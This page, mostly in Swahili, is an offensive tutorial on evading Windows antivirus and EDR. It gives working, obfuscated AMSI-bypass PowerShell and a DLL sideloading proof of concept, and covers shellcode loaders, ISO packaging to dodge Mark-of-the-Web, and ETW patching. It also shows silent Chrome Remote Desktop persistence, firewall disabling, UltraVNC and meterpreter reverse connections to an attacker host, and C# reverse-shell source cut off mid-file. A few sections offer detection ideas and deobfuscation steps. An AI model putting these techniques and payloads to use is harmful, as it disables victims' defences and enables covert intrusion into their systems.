Antivirus (AV) Bypass

Reading time: 37 minutes

Ukurasa huu uliandikwa na @m2rc_p!

Kusimamisha Defender

• defendnot: Chombo cha kusimamisha Windows Defender kufanya kazi.
• no-defender: Chombo cha kusimamisha Windows Defender kwa kuiga AV nyingine.
• Disable Defender if you are admin

AV Evasion Methodology

Kwa sasa, AVs hutumia mbinu mbalimbali za kuangalia kama faili ni mbaya au la: static detection, dynamic analysis, na kwa EDRs zilizo juu zaidi, behavioural analysis.

Static detection

Static detection inafikiwa kwa kuangazia known malicious strings au arrays za bytes ndani ya binary au script, na pia kwa kutoa taarifa kutoka kwa faili yenyewe (mfano file description, company name, digital signatures, icon, checksum, n.k.). Hii inamaanisha kwamba kutumia public tools zinazojulikana kunaweza kukufanya ugunduliwe kwa urahisi, kwa sababu huenda tayari zimechunguzwa na kuorodheshwa kama zenye hatari. Kuna njia kadhaa za kuzunguka aina hii ya utambuzi:

• Encryption

Ikiwa utaencrypt binary, hakutakuwa na njia kwa AV kugundua program yako, lakini utahitaji aina fulani ya loader ili decrypt na kuendesha program hiyo kwenye memory.

• Obfuscation

Wakati mwingine unachotakiwa kufanya ni kubadilisha baadhi ya strings katika binary au script yako ili ipite mbele ya AV, lakini hili linaweza kuwa kazi inayochukua muda kulingana na unachojaribu obfuscate.

• Custom tooling

Ikiwa utatengeneza tools zako mwenyewe, haitakuwa na known bad signatures, lakini hii inachukua muda mwingi na juhudi.

Ninapendekeza uangalie hii YouTube playlist kuhusu AV Evasion ya vitendo.

Dynamic analysis

Dynamic analysis ni pale AV inapoweka binary yako ndani ya sandbox na kuangalia shughuli za uharibifu (mfano kujaribu decrypt na kusoma passwords za browser, kufanya minidump kwenye LSASS, n.k.). Sehemu hii inaweza kuwa ngumu zaidi kushughulikia, lakini hapa kuna mambo unaweza kufanya ili kuepuka sandboxes.

• Sleep before execution Kulingana na jinsi imeimplementiwa, inaweza kuwa njia nzuri ya kupita dynamic analysis ya AV. AVs zina muda mfupi sana wa kuscan faili ili zisitokee kuingilia mtiririko wa kazi wa mtumiaji, hivyo kutumia long sleeps kunaweza kuingilia uchunguzi wa binaries. Tatizo ni kwamba sandboxes za AV nyingi zinaweza kupita sleep tu kulingana na jinsi imekaziwa.
• Checking machine's resources Kwa kawaida Sandboxes zina resources chache (mfano < 2GB RAM), vinginevyo zingedharauzesha machine ya mtumiaji. Unaweza kuwa mbunifu hapa, kwa mfano ukakagua joto la CPU au hata fan speeds, sio kila kitu kitatekelezwa kwenye sandbox.
• Machine-specific checks Ikiwa unataka kulenga mtumiaji ambaye workstation yake imejiunga na domain ya "contoso.local", unaweza kufanya check kwenye domain ya kompyuta kuona kama inalingana na ile uliyotaja; kama haitalingani, unaweza kufanya program yako exit.

Inabainika kuwa computername ya Microsoft Defender's Sandbox ni HAL9TH, kwa hivyo, unaweza kukagua computer name katika malware yako kabla ya detonation; ikiwa name inalingana na HAL9TH, inamaanisha uko ndani ya defender's sandbox, hivyo unaweza kufanya program yako exit.

Baadhi ya vidokezo vingine nzuri kutoka kwa @mgeeky kuhusu jinsi ya kukabiliana na Sandboxes

Kama tulivyosema hapo awali, public tools hatimaye zitagunduliwa, kwa hivyo, jiulize jambo hili:

Kwa mfano, kama unataka dump LSASS, je, kweli unahitaji kutumia mimikatz? Au unaweza kutumia project nyingine ambayo hairuhusiwi sana na pia inadump LSASS?

Jibu sahihi labda ni hili la pili. Kuchukua mimikatz kama mfano, huenda ikawa moja ya, kama sio ile iliyopigwa flag zaidi, kipande cha malware na AVs na EDRs; ingawa project yenyewe ni nzuri sana, pia ni nightmare kuifanya iwe kazi ili kuzunguka AVs, kwa hivyo tafuta mbadala kwa kile unachojaribu kufanikisha.

EXEs vs DLLs

Iwapo inawezekana, daima precedence kutumia DLLs kwa ajili ya evasion; kwa uzoefu wangu, DLL files kwa kawaida huishikiwa na kugunduliwa kidogo sana, hivyo ni mbinu rahisi sana ya kuepuka utambuzi katika baadhi ya kesi (kama payload yako ina njia ya kukimbia kama DLL bila shaka).

Kama tunaweza kuona katika picha hii, DLL Payload kutoka Havoc ina detection rate ya 4/26 kwenye antiscan.me, wakati EXE payload ina detection rate ya 7/26.

Sasa tutaonyesha tricks unaweza kutumia na DLL files ili kuwa na ujasiri zaidi.

DLL Sideloading & Proxying

DLL Sideloading inatumia faida ya DLL search order inayotumika na loader kwa kuweka victim application na malicious payload(s) karibu pamoja.

Unaweza kuangalia programu zinazoweza kuathiriwa na DLL Sideloading kwa kutumia Siofra na powershell script ifuatayo:

Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}

This command will output the list of programs susceptible to DLL hijacking inside "C:\Program Files\" and the DLL files they try to load.

Ninapendekeza sana uchunguze mwenyewe programu za DLL Hijackable/Sideloadable, mbinu hii ni ya kimya sana inapofanywa ipasavyo, lakini ikiwa utatumia programu za DLL Sideloadable zinazojulikana kwa umma, unaweza kukamatwa kwa urahisi.

Kuweka tu malicious DLL yenye jina ambalo programu inatarajia kupakia haitapakia payload yako, kwa sababu programu inatarajia kazi maalum ndani ya DLL hiyo; ili kurekebisha tatizo hili, tutatumia mbinu nyingine iitwayo DLL Proxying/Forwarding.

DLL Proxying inapitisha miito ambayo programu inafanya kutoka kwa proxy (na malicious) DLL kwenda DLL ya asili, hivyo ikihifadhi utendaji wa programu na kuwa na uwezo wa kushughulikia utekelezaji wa payload yako.

Nitatumia mradi SharpDLLProxy kutoka kwa @flangvik

Hizi ndizo hatua nilizofuata:

1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)

Amri ya mwisho itatupatia faili 2: kiolezo cha chanzo cha DLL, na DLL ya asili iliyobadilishwa jina.

Both our shellcode (encoded with SGN) and the proxy DLL have a 0/26 Detection rate in antiscan.me! I would call that a success.

Kutumia Forwarded Exports (ForwardSideLoading)

Windows PE modules can export functions that are actually "forwarders": instead of pointing to code, the export entry contains an ASCII string of the form TargetDll.TargetFunc. When a caller resolves the export, the Windows loader will:

• Ipakue TargetDll ikiwa bado haijaload
• Tafuta TargetFunc kutoka kwake

Key behaviors to understand:

• If TargetDll is a KnownDLL, it is supplied from the protected KnownDLLs namespace (e.g., ntdll, kernelbase, ole32).
• If TargetDll is not a KnownDLL, the normal DLL search order is used, which includes the directory of the module that is doing the forward resolution.

This enables an indirect sideloading primitive: find a signed DLL that exports a function forwarded to a non-KnownDLL module name, then co-locate that signed DLL with an attacker-controlled DLL named exactly as the forwarded target module. When the forwarded export is invoked, the loader resolves the forward and loads your DLL from the same directory, executing your DllMain.

Example observed on Windows 11:

keyiso.dll KeyIsoSetAuditingInterface -> NCRYPTPROV.SetAuditingInterface

NCRYPTPROV.dll si KnownDLL, hivyo inatatuliwa kupitia mpangilio wa kawaida wa utafutaji.

PoC (kunakili na kubandika):

1. Nakili DLL ya mfumo iliyosainiwa kwenye folda inayoweza kuandikwa

copy C:\Windows\System32\keyiso.dll C:\test\

2. Weka NCRYPTPROV.dll yenye madhara katika folda hiyo hiyo. DllMain ndogo ya msingi inatosha kupata utekelezaji wa msimbo; huna haja ya kutekeleza forwarded function ili kusababisha DllMain.

// x64: x86_64-w64-mingw32-gcc -shared -o NCRYPTPROV.dll ncryptprov.c
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved){
if (reason == DLL_PROCESS_ATTACH){
HANDLE h = CreateFileA("C\\\\test\\\\DLLMain_64_DLL_PROCESS_ATTACH.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(h!=INVALID_HANDLE_VALUE){ const char *m = "hello"; DWORD w; WriteFile(h,m,5,&w,NULL); CloseHandle(h);}
}
return TRUE;
}

3. Chochea forward kwa LOLBin iliyosainiwa:

rundll32.exe C:\test\keyiso.dll, KeyIsoSetAuditingInterface

Observed behavior:

• rundll32 (imesainiwa) inapakia side-by-side keyiso.dll (imesainiwa)
• Wakati ikitatua KeyIsoSetAuditingInterface, loader inafuata forward hadi NCRYPTPROV.SetAuditingInterface
• Kisha loader inapakia NCRYPTPROV.dll kutoka C:\test na inatekeleza DllMain yake
• Ikiwa SetAuditingInterface haijatimizwa, utapata kosa la "missing API" tu baada ya DllMain tayari kukimbia

Hunting tips:

• Zingatia forwarded exports ambapo moduli lengwa si KnownDLL. KnownDLLs zimeorodheshwa chini ya HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
• Unaweza kuorodhesha forwarded exports kwa zana kama:

dumpbin /exports C:\Windows\System32\keyiso.dll
# forwarders appear with a forwarder string e.g., NCRYPTPROV.SetAuditingInterface

• Tazama inventory ya forwarder ya Windows 11 ili kutafuta wagombea: https://hexacorn.com/d/apis_fwd.txt

Detection/defense ideas:

• Fuatilia LOLBins (kwa mfano, rundll32.exe) zinazopakia signed DLLs kutoka non-system paths, na kisha zinapakia non-KnownDLLs zenye base name sawa kutoka kwenye directory hiyo
• Toa onyo kuhusu mnyororo wa process/module kama: rundll32.exe → non-system keyiso.dll → NCRYPTPROV.dll chini ya user-writable paths
• Tekeleza sera za code integrity (WDAC/AppLocker) na kataa write+execute katika application directories

Freeze

Freeze ni payload toolkit ya ku-bypass EDRs kwa kutumia suspended processes, direct syscalls, na alternative execution methods

Unaweza kutumia Freeze kupakia na kutekeleza shellcode yako kwa njia fiche.

Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender

AMSI (Anti-Malware Scan Interface)

AMSI ilianzishwa ili kuzuia "fileless malware". Mwanzoni, AVs ziliweza tu kuchambua files on disk, hivyo kama ungeweza kutekeleza payloads in-memory, AV haingeweza kufanya chochote kuzuia, kwa kuwa haikuwa na mwonekano wa kutosha.

The AMSI feature is integrated into these components of Windows.

• User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation)
• PowerShell (scripts, interactive use, and dynamic code evaluation)
• Windows Script Host (wscript.exe and cscript.exe)
• JavaScript and VBScript
• Office VBA macros

Inaruhusu suluhisho za antivirus kuchunguza tabia za scripts kwa kufunua yaliyomo kwenye script kwa njia ambayo hayajakifichwa na hayajaundwa kwa obfuscation.

Running IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') will produce the following alert on Windows Defender.

Notice how it prepends amsi: and then the path to the executable from which the script ran, in this case, powershell.exe

Hatujaweka faili lolote kwenye diski, lakini bado tulikamatwa while executing in-memory kwa sababu ya AMSI.

Moreover, starting with .NET 4.8, C# code is run through AMSI as well. This even affects Assembly.Load(byte[]) to load in-memory execution. Thats why using lower versions of .NET (like 4.7.2 or below) is recommended for in-memory execution if you want to evade AMSI.

Kuna njia chache za kuzidi AMSI:

• Obfuscation

Kwa kuwa AMSI kwa kiasi kikubwa inategemea detections za static, hivyo, kubadilisha scripts unazojaribu kuziweka inaweza kuwa njia nzuri ya kukwepa ugundaji.

Hata hivyo, AMSI ina uwezo wa kuondoa obfuscation hata kama ina tabaka kadhaa, hivyo obfuscation inaweza isiwe chaguo zuri kulingana na jinsi inavyofanywa. Hii inafanya isiwe rahisi kukwepa. Ingawa, wakati mwingine, yote unayohitaji ni kubadilisha baadhi ya majina ya variable na utakuwa sawa, hivyo inategemea kiasi ambacho kitu kimekuwa kimeorodheshwa.

• AMSI Bypass

Since AMSI is implemented by loading a DLL into the powershell (also cscript.exe, wscript.exe, etc.) process, it's possible to tamper with it easily even running as an unprivileged user. Due to this flaw in the implementation of AMSI, researchers have found multiple ways to evade AMSI scanning.

Forcing an Error

Kusababisha AMSI initialization kushindwa (amsiInitFailed) kutasababisha hakuna scan itakayozinduliwa kwa process ya sasa. Huu ulifichuliwa awali na Matt Graeber na Microsoft imeunda signature ili kuzuia matumizi mapana.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Ilichukua tu mstari mmoja wa powershell code ili kufanya AMSI isitumike kwa mchakato wa powershell wa sasa. Laini hii bila shaka imetambuliwa na AMSI yenyewe, hivyo inahitajika marekebisho ili kutumia mbinu hii.

Hapa kuna AMSI bypass iliyorekebishwa niliyopata kutoka kwenye Github Gist.

Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}

Kumbuka, kuna uwezekano hili litachukuliwa kama hatari mara chapisho hili litakapotoka, hivyo usichapishe code ikiwa mpango wako ni kubaki bila kugunduliwa.

Memory Patching

Mbinu hii iligunduliwa mwanzoni na @RastaMouse na inahusisha kupata anuani ya kazi ya "AmsiScanBuffer" katika amsi.dll (inyenye inawajibika kukagua data iliyotolewa na mtumiaji) na kuiandika juu kwa maagizo yanayorejesha nambari ya E_INVALIDARG; kwa njia hii, matokeo ya uchunguzi yenyewe yatarudisha 0, ambayo huchukuliwa kama matokeo safi.

Kuna mbinu nyingi nyingine zinazotumiwa kupita AMSI kwa powershell, angalia ukurasa huu na repo hii ili ujifunze zaidi kuhusu hizo.

Chombo hiki https://github.com/Flangvik/AMSI.fail pia hutoa script za kupita AMSI.

Ondoa saini iliyotambuliwa

Unaweza kutumia zana kama https://github.com/cobbr/PSAmsi na https://github.com/RythmStick/AMSITrigger kuondoa saini ya AMSI iliyotambuliwa kutoka kwenye memory ya process ya sasa. Zana hii inafanya kazi kwa kuchunguza memory ya process ya sasa kwa ajili ya saini ya AMSI kisha kuibandika tena kwa maagizo ya NOP, kwa ufanisi kuiondoa kwenye memory.

Bidhaa za AV/EDR zinazotumia AMSI

Unaweza kupata orodha ya bidhaa za AV/EDR zinazotumia AMSI katika https://github.com/subat0mik/whoamsi.

Tumia PowerShell version 2 Ikiwa unatumia PowerShell version 2, AMSI haitapakiwa, hivyo unaweza kuendesha scripts zako bila kukaguliwa na AMSI. Unaweza kufanya hivi:

powershell.exe -version 2

PS Logging

PowerShell logging ni sifa inayokuwezesha kurekodi amri zote za PowerShell zinazotekelezwa kwenye mfumo. Hii inaweza kuwa ya msaada kwa auditing na troubleshooting, lakini pia inaweza kuwa tatizo kwa wanavurugu wanaotaka kuepuka kugunduliwa.

To bypass PowerShell logging, unaweza kutumia mbinu zifuatazo:

• Disable PowerShell Transcription and Module Logging: Unaweza kutumia zana kama https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs kwa kusudi hili.
• Use Powershell version 2: Ikiwa utatumia PowerShell version 2, AMSI haitapakiwa, hivyo unaweza kuendesha scripts zako bila kukaguliwa na AMSI. Unaweza kufanya hivi: powershell.exe -version 2
• Use an Unmanaged Powershell Session: Tumia https://github.com/leechristensen/UnmanagedPowerShell kuanzisha powershell bila defenses (hili ndilo powerpick kutoka Cobal Strike linavyotumia).

Obfuscation

Deobfuscating ConfuserEx-Protected .NET Binaries

Wakati wa kuchambua malware inayotumia ConfuserEx 2 (au forks za kibiashara) mara nyingi utakutana na ngazi kadhaa za ulinzi zitakazowazuia decompilers na sandboxes. Workflow hapa chini inarejesha kwa uaminifu near–original IL ambayo baadaye inaweza ku-decompile hadi C# kwa kutumia zana kama dnSpy au ILSpy.

1. Anti-tampering removal – ConfuserEx encrypts every method body and decrypts it inside the module static constructor (<Module>.cctor). Hii pia inapatch checksum ya PE hivyo mabadiliko yoyote yatasababisha binary ifuate crash. Tumia AntiTamperKiller kutafuta encrypted metadata tables, kurecover XOR keys na kuandika assembly safi:

# https://github.com/wwh1004/AntiTamperKiller
python AntiTamperKiller.py Confused.exe Confused.clean.exe

Output ina parameters 6 za anti-tamper (key0-key3, nameHash, internKey) ambazo zinaweza kuwa muhimu wakati ukijenga unpacker yako mwenyewe.

2. Symbol / control-flow recovery – peana faili clean kwa de4dot-cex (fork ya de4dot yenye uelewa wa ConfuserEx).

de4dot-cex -p crx Confused.clean.exe -o Confused.de4dot.exe

Flags: • -p crx – chagua ConfuserEx 2 profile
• de4dot itaondoa control-flow flattening, kurejesha namespaces za asili, classes na majina ya variables na ku-decrypt constant strings.

3. Proxy-call stripping – ConfuserEx inabadilisha method calls za moja kwa moja kuwa wrappers nyepesi (a.k.a proxy calls) ili kuvunja further decompilation. Ondoa hizo kwa ProxyCall-Remover:

ProxyCall-Remover.exe Confused.de4dot.exe Confused.fixed.exe

Baada ya hatua hii unapaswa kuona kawaida .NET API kama Convert.FromBase64String au AES.Create() badala ya wrapper functions za giza (Class8.smethod_10, …).

4. Manual clean-up – endesha binary iliyopatikana chini ya dnSpy, tafuta Base64 blobs kubwa au matumizi ya RijndaelManaged/TripleDESCryptoServiceProvider ili kupata payload ya kweli. Mara nyingi malware huihifadhi kama TLV-encoded byte array iliyowekwa ndani ya <Module>.byte_0.

Mnyororo hapo juu unarejesha execution flow without haja ya kuendesha sampuli yenye madhara – yenye msaada wakati unafanya kazi kwenye workstation isiyounganishwa.

🛈 ConfuserEx hutengeneza attribute maalum inayoitwa ConfusedByAttribute ambayo inaweza kutumika kama IOC ku-triage samples moja kwa moja.

One-liner

autotok.sh Confused.exe  # wrapper that performs the 3 steps above sequentially

• InvisibilityCloak: Obfuscator ya C#
• Obfuscator-LLVM: Lengo la mradi huu ni kutoa fork ya open-source ya LLVM compilation suite inayoweza kutoa ulinzi zaidi wa programu kupitia code obfuscation na tamper-proofing.
• ADVobfuscator: ADVobfuscator inaonyesha jinsi ya kutumia lugha ya C++11/14 kuunda, wakati wa kucompile, obfuscated code bila kutumia zana za nje na bila kubadilisha compiler.
• obfy: Inongeza tabaka la obfuscated operations zinazozalishwa na C++ template metaprogramming framework ambayo itafanya maisha ya mtu anayejaribu kuvunja application kuwa ngumu kidogo.
• Alcatraz: Alcatraz ni x64 binary obfuscator inayoweza kuficha aina mbalimbali za pe files ikiwa ni pamoja na: .exe, .dll, .sys
• metame: Metame ni engine rahisi ya metamorphic code kwa executables yoyote.
• ropfuscator: ROPfuscator ni fine-grained code obfuscation framework kwa LLVM-supported languages ikitumia ROP (return-oriented programming). ROPfuscator inaficha programu kwenye assembly code level kwa kubadilisha instructions za kawaida kuwa ROP chains, ikizuia mtazamo wetu wa kawaida wa control flow.
• Nimcrypt: Nimcrypt ni .NET PE Crypter imeandikwa kwa Nim
• inceptor: Inceptor inaweza kubadilisha EXE/DLL zilizopo kuwa shellcode kisha kuzipakia

SmartScreen & MoTW

Labda umeona skrini hii unapopakua baadhi ya executables kutoka kwenye intaneti na kuziendesha.

Microsoft Defender SmartScreen ni mekanismo ya usalama iliyolengwa kumlinda mtumiaji wa mwisho dhidi ya kuendesha applications ambazo zinaweza kuwa za hatari.

SmartScreen inafanya kazi kwa mtazamo wa msingi wa sifa (reputation-based approach), ikimaanisha kwamba applications zisizopakuliwa mara kwa mara zitatia off SmartScreen na kuonya na kuzuia mtumiaji wa mwisho kuendesha faili (hata hivyo faili bado zinaweza kuendeshwa kwa kubofya More Info -> Run anyway).

MoTW (Mark of The Web) ni NTFS Alternate Data Stream yenye jina Zone.Identifier ambayo huundwa moja kwa moja unapopakua faili kutoka mtandaoni, pamoja na URL kutoka ambako ilipakuliwa.

Njia yenye ufanisi sana ya kuzuia payloads zako kupata Mark of The Web ni kuzifunga ndani ya container kama ISO. Hii hutokea kwa sababu Mark-of-the-Web (MOTW) cannot kutumika kwenye volumes non NTFS.

PackMyPayload ni zana inayofunga payloads kwenye output containers ili kuepuka Mark-of-the-Web.

Mfano wa utumiaji:

PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso

+      o     +              o   +      o     +              o
+             o     +           +             o     +         +
o  +           +        +           o  +           +          o
-_-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-_-_-_-_-_-_-_,------,      o
:: PACK MY PAYLOAD (1.1.0)       -_-_-_-_-_-_-|   /\_/\
for all your container cravings   -_-_-_-_-_-~|__( ^ .^)  +    +
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-__-_-_-_-_-_-_-''  ''
+      o         o   +       o       +      o         o   +       o
+      o            +      o    ~   Mariusz Banach / mgeeky    o
o      ~     +           ~          <mb [at] binary-offensive.com>
o           +                         o           +           +

[.] Packaging input file to output .iso (iso)...
Burning file onto ISO:
Adding file: /TotallyLegitApp.exe

[+] Generated file written to (size: 3420160): container.iso

Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using PackMyPayload

ETW

Event Tracing for Windows (ETW) ni mfumo wenye nguvu wa kurekodi matukio kwenye Windows unaowawezesha programu na vipengele vya mfumo kurekodi matukio. Hata hivyo, pia inaweza kutumiwa na bidhaa za usalama kuangalia na kugundua shughuli zenye madhara.

Vivyo hivyo jinsi AMSI inavyozimwa (bypassed) inawezekana pia kufanya yafunction ya user space EtwEventWrite irudie mara moja bila kurekodi matukio yoyote. Hii hufanyika kwa kupatch function hiyo katika memory ili irudie mara moja, hivyo kwa ufanisi kuzima kurekodi kwa ETW kwa mchakato huo.

Unaweza kupata taarifa zaidi katika https://blog.xpnsec.com/hiding-your-dotnet-etw/ and https://github.com/repnz/etw-providers-docs/.

C# Assembly Reflection

Kupakia binaries za C# kwenye memory imejulikana kwa muda mrefu na bado ni njia nzuri ya kuendesha zana zako za post-exploitation bila kugunduliwa na AV.

Kwa kuwa payload itawekwa moja kwa moja kwenye memory bila kugusa disk, tutalazimika tu kushughulikia patch ya AMSI kwa mchakato mzima.

Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) tayari hutoa uwezo wa kuendesha C# assemblies moja kwa moja kwenye memory, lakini kuna njia tofauti za kufanya hivyo:

• Fork&Run

Inahusisha kuumba mchakato mpya wa kujitoa (sacrificial process), ku-inject code yako ya post-exploitation ndani ya mchakato huo mpya, kuendesha code yako ya uharibifu na ukimaliza, kuua mchakato mpya. Hii ina faida zake na hasara zake. Faida ya njia ya fork and run ni kwamba utekelezaji unafanyika nje ya mchakato wetu wa Beacon implant. Hii ina maana kwamba kama kitu kimeenda vibaya au kimegunduliwa katika kitendo chetu cha post-exploitation, kuna uwezekano mkubwa wa implant yetu kuendelea kuishi. Hasara ni kwamba una uwezekano mkubwa wa kugunduliwa na Behavioural Detections.

• Inline

Inahusu ku-inject code ya post-exploitation ya uharibifu ndani ya mchakato wake mwenyewe. Kwa njia hii, unaweza kuepuka kuunda mchakato mpya na kukiwekwa chini ya skana ya AV, lakini hasara ni kwamba kama kitu kitatokea vibaya kwa utekelezaji wa payload yako, kuna uwezekano mkubwa wa kupoteza beacon yako kwani inaweza kufunguka (crash).

Unaweza pia kupakia C# Assemblies kutoka PowerShell, angalia Invoke-SharpLoader na S3cur3th1sSh1t's video.

Using Other Programming Languages

Kama ilivyopendekezwa katika https://github.com/deeexcee-io/LOI-Bins, inawezekana kuendesha code ya uharibifu kwa kutumia lugha nyingine kwa kumruhusu mashine iliyodhulumiwa kupata interpreter environment iliyowekwa kwenye Attacker Controlled SMB share.

Kwa kuruhusu upatikanaji wa Interpreter Binaries na environment kwenye SMB share unaweza kuendesha code yoyote katika lugha hizi ndani ya memory ya mashine iliyodhulumiwa.

Repo inasema: Defender bado inaskana scripts lakini kwa kutumia Go, Java, PHP n.k tuna uwezo zaidi wa kupitisha signatures za static. Majaribio kwa kutumia random un-obfuscated reverse shell scripts katika lugha hizi yamefanikiwa.

TokenStomping

Token stomping ni mbinu inayomruhusu mshambuliaji kudanganya access token au bidhaa ya usalama kama EDR au AV, kumruhusu kupunguza haki zake ili mchakato usife lakini usiwe na ruhusa za kukagua shughuli zenye madhara.

Kuzuia hili Windows inaweza kuzuia mchakato wa nje kupata handles juu ya tokens za mchakato za usalama.

• https://github.com/pwn1sher/KillDefender/
• https://github.com/MartinIngesen/TokenStomp
• https://github.com/nick-frischkorn/TokenStripBOF

Using Trusted Software

Chrome Remote Desktop

Kama ilivyoelezwa katika this blog post, ni rahisi tu kufunga Chrome Remote Desktop kwenye PC ya mwathiri na kisha kuitumia kumchukua na kudumisha persistence:

1. Download kutoka https://remotedesktop.google.com/, bonyeza "Set up via SSH", kisha bonyeza faili la MSI kwa Windows kupakua MSI file.
2. Endesha installer kimya kwenye mashine ya mwathiri (inahitaji admin): msiexec /i chromeremotedesktophost.msi /qn
3. Rudi kwenye ukurasa wa Chrome Remote Desktop na bonyeza next. Wizard kisha itakuuliza ku-authorize; bonyeza kitufe cha Authorize ili kuendelea.
4. Endesha parameter iliyotolewa kwa mabadiliko machache: "%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111 (Kumbuka param ya pin ambayo inaruhusu kuweka pin bila kutumia GUI).

Advanced Evasion

Evasion ni mada ngumu sana, mara nyingi unalazimika kuzingatia vyanzo vingi vya telemetry katika mfumo mmoja tu, kwa hivyo ni karibu haiwezekani kubaki bila kugunduliwa kabisa katika mazingira yenye umri/uttekelezaji wa juu.

Kila mazingira unayowahi kukabiliana nayo yata kuwa na nguvu na udhaifu wake mwenyewe.

Ninakuhimiza sana utaangalie hotuba hii kutoka kwa @ATTL4S, ili kupata ufahamu wa mbinu za Advanced Evasion.

[NcN2k20] Understanding and Hiding your Operations - Daniel L&oacute;pez Jim&eacute;nez

Hii pia ni hotuba nyingine nzuri kutoka kwa @mariuszbit kuhusu Evasion in Depth.

- YouTube

Old Techniques

Check which parts Defender finds as malicious

Unaweza kutumia ThreatCheck ambayo itatoa sehemu za binary moja baada ya nyingine mpaka itagundua ni sehemu gani Defender inaiona kuwa zenye uhalifu na kuigawanya kwako.
Zana nyingine inayofanya kitu kama hicho ni avred yenye huduma ya wavuti katika https://avred.r00ted.ch/

Telnet Server

Mpaka Windows10, Windows zote zilikuja na Telnet server ambayo unaweza kuiweka (kama administrator) kwa kufanya:

pkgmgr /iu:"TelnetServer" /quiet

Fanya ianze wakati mfumo unapowashwa na iendeshe sasa:

sc config TlntSVR start= auto obj= localsystem

Badilisha telnet port (stealth) na zimisha firewall:

tlntadmn config port=80
netsh advfirewall set allprofiles state off

UltraVNC

Download it from: http://www.uvnc.com/downloads/ultravnc.html (unataka downloads za bin, sio setup)

ON THE HOST: Endesha winvnc.exe na sanidi server:

• Washa chaguo Disable TrayIcon
• Weka nenosiri katika VNC Password
• Weka nenosiri katika View-Only Password

Kisha, hamisha binary winvnc.exe na faili mpya iliyoundwa UltraVNC.ini ndani ya victim

Reverse connection

The attacker anapaswa endesha ndani ya host yake binary vncviewer.exe -listen 5900 ili itakuwa tayari kukamata reverse VNC connection. Kisha, ndani ya victim: Anza daemon ya winvnc winvnc.exe -run na endesha winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900

ONYO: Ili kudumisha stealth lazima usifanye mambo kadhaa

• Usianzishe winvnc ikiwa tayari inafanya kazi au utasababisha popup. angalia ikiwa inaendesha na tasklist | findstr winvnc
• Usianzishe winvnc bila UltraVNC.ini katika directory hiyo hiyo au itasababisha the config window kufunguka
• Usitumie winvnc -h kwa help au utasababisha popup

GreatSCT

Download it from: https://github.com/GreatSCT/GreatSCT

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py

Ndani ya GreatSCT:

use 1
list #Listing available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole

Sasa anza lister kwa msfconsole -r file.rc na endesha xml payload kwa:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml

Mlinzi wa sasa atakata mchakato kwa haraka sana.

Kuunda reverse shell yetu mwenyewe

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

C# Revershell ya kwanza

Ikompili kwa:

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt

Tumia pamoja na:

back.exe <ATTACKER_IP> <PORT>

// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;

public static void Main(string[] args)
{
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);

StringBuilder strInput = new StringBuilder();

